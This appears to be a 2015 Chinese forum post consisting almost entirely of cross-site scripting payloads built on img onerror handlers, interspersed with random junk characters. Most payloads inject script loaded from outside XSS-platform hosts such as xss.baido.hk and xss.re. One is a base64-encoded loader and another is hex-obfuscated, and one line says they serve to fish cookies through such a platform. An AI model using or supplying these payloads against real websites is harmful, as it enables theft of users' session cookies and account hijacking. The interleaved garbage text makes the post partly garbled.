<img src='non-exist.jpg'onerror="alert('xss')">, o1 Y5 o$ E$ F6 K; i- C* y
<img src=# onerror=alert(123)>
8 G1 o# u+ b9 R" c<img src=# onerror=alert(document.cookie)>, M: k1 ~/ [, O. d* q3 Q" `
下面是利用平台钓cookie的7 i. F. I. P9 `9 ?
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
- {6 t* }3 i$ j, N/ H. E: e0 ^" N( D2 S6 K, C* l: |
/ H: _* ?, H! S; _4 R
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>) |3 K6 z, n l& M
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>* Z% b) Z; }4 {% x
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>) J8 `2 S; t" a; t# C
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
& c7 T4 u0 l3 j/ |' K* @" Z<img src="#">
) M& ?. [% r1 w; C( ^* A" D<img src="#">
' @) ^- W7 A, r7 D<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
! O0 b$ _0 ]/ t; W& `<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
, p4 P; F5 p5 r7 j; C& H2 Z1 G<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>4 a* C7 y8 f8 r: Y. L
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
- D" J( ]; s( e; L<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
( f2 X$ L: g* g5 o7 h0 Y<img src=x width="0" height="0"></img>3 l4 }, x4 o' Y4 i
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>% ^. V; q% d# m( H3 Z% _+ f6 g
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>( N, T* ]0 L. Y" ^
|
发表于 2015-10-18 14:33:54
收藏
支持
反对